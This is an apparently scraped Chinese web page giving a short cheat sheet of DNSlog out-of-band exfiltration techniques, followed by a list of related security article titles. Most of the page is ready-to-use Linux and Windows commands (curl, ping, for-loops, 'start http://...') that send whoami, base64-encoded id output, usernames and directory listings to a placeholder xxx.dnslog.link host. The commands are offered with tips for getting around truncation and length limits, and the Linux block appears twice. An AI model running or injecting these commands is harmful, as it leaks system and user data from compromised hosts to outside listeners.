摘要

linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚本; for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done; windows:

linux:

curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚本; for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;

windows:

利用HTTP请求: for /F %x in ('whoami') do start http://xxx.dnslog.link/%x 将结果使用默认浏览器弹出; 利用DNS请求: 获取计算机名:for /F "delims=/" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 获取用户名:for /F "delims=/ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link 不能编码输出,但利用powershell可以实现; dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出; for /F %x in ('dir /b C:/') do start http://xxx.dnslog.link/[%x].jpg

linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网相关推荐

  1. 12年前的 Linux bug 复活,DNS 缓存投毒攻击重现

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 清华大学和加州大学组成的研究团队发现一种可发动 DNS 缓存投毒攻击的新方法.这种方法重新激活了本以为已完全修复的2008年现身的一个 ...

  2. DNS域欺骗攻击详细教程之Windows篇

    一.DNS域欺骗攻击原理 DNS欺骗即域名信息欺骗是最常见的DNS安全问题.当一个DNS服务器掉入陷阱,使用了来自一个恶意DNS服务器的错误信息,那么该DNS服务器就被欺骗了.DNS欺骗会使那些易受攻 ...

  3. 安全测试(四) Wi-Fi安全 渗透测试 网络安全 公共场的免费Wi-Fi真的安全吗?个人信息被监控窃听风险 如: ARP攻击 SSL攻击 DNS安全 加密方式等 枚举实战应用案例 信息窃听获取

    文章目录 一.前言 二.Wi-Fi 安全知识普及 2.1 Wi-Fi(Wireless Fidelity)是什么? 2.2 Wi-Fi 安全吗? 2.3 Wi-Fi 安全加密方式介绍 2.3.1  W ...

  4. dos攻击命令_Kali Linux系列之拒绝服务攻击(DOS)实战(下)

    (你的世界是个什么样的世界?你说,我们倾听!)                                                      利用系统漏洞进行拒绝服务攻击 1.利用系统漏洞 ...

  5. Kali Linux系列之拒绝服务攻击(DOS)实战(下)

    ​ (你的世界是个什么样的世界?你说,我们倾听!)                                                      利用系统漏洞进行拒绝服务攻击 1.利用系统 ...

  6. linux arp攻击教程,Linux下防御arp攻击的方法

    Linux下防御arp攻击的方法 发布时间:2008-09-08 17:09:19   作者:佚名   我要评论 1.获取同一网段下所有机器MAC地址的办法 机房有机器中毒,发arp包,通过arpsp ...

  7. linux下查看cc攻击

    什么是CC攻击?CC攻击就是利用大量代理服务器对目标计算机发起大量连接,导致目标服务器资源枯竭造成拒绝服务.那么如何判断查询CC攻击呢?本文主要介绍了一些Linux下判断CC攻击的命令. 查看所有80 ...

  8. DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器...

    DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E ...

  9. linux 系统如何防止攻击

    linux 系统如何防止攻击 经常看看登录日志:/var/log/secure 看到登录失败的,就当做需要攻防的ip 例如  Failed password for root from 107.155 ...

最新文章

  1. 5G NGC — 关键技术 — 网络切片 — 切片的运维与运营
  2. 微软面试题系列(四):在二元树中找出和为某一值的所有路径
  3. HDU 2064:汉诺塔III
  4. vue.js单文件组件中非父子组件的传值
  5. 一个go1.9.x 编译器内联引起的栈信息错乱的问题分析
  6. 电脑编程python和c加加语言的区别_小猿圈之Bash 和 Python 编程语言优缺点
  7. JSF Spring Hibernate集成示例教程
  8. RabbitMq(十一) 死信交换机DLX介绍及使用
  9. Mosquito的优化——其他优化(九)
  10. easyui结合java,Spring+SpringMVC+MyBatis+easyUI整合基础篇(二)牛刀小试
  11. LeetCode-144-Binary Tree Preorder Traversal
  12. lisp的vla函数画矩形_VisualLisp若干自定义函数
  13. linux模拟gps,Android之GPS研究(实战篇二)
  14. 「算法介绍」如何设计最安全的加密机制
  15. JAVA程序运行原理——知其然,而知其所以然
  16. 个人空间岁末大回报活动12月23日获奖名单
  17. Processing笔记04—鼠标键盘识别
  18. MySQL8 免安装版安装
  19. 科技爱好者周刊(第 106 期):数字游民
  20. 形态等位点对迭代次数的贡献

热门文章

  1. SSIS实用教程(SQLServer2005)
  2. sql_1-2_get基于盲注
  3. 【数据结构与算法】之深入解析“验证二叉搜索树”的求解思路与算法示例
  4. iOS之深入解析类加载的底层原理:类如何加载到内存中
  5. EduCoder Linux之文件打包和解压缩
  6. PAT (Basic Level) Practice (中文)C++ python 语言实现 —— 题解目录
  7. Java初阶知识总结
  8. notepad运行python为啥与pycharm运行的结果不一样_零基础初学Python,需要装什么软件?...
  9. c# vscode 配置_[VSCode插件推荐] Code Runner: 代码一键运行,支持超过40种语言
  10. php中的意外type字符串,关于php:解析错误:语法错误,意外’文本’(T_STRING),期待’,’或’;’...